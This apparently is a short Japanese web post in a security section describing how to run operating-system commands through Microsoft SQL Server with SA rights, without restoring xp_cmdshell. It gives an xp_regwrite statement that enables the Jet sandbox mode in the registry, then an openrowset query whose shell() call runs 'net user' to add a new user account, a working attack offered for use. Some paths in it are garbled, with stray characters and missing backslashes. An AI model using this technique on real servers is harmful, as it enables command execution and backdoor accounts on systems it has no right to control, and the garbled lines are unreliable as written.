1. ホーム
  2. Web プログラミング
  3. セキュリティ関連

SA サンドボックスモードで xp_cmdshell と xplog70.dll をリストアせずにコマンドを実行する。

2022-01-01 20:18:07
まずサンドボックスモードを開きます。
exec master...xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoft³³³³³³Engines','SandBoxMode','REG_DWORD',1
次に、jet.ledb を使ってシステムコマンドを実行します。
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windowssystem32ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')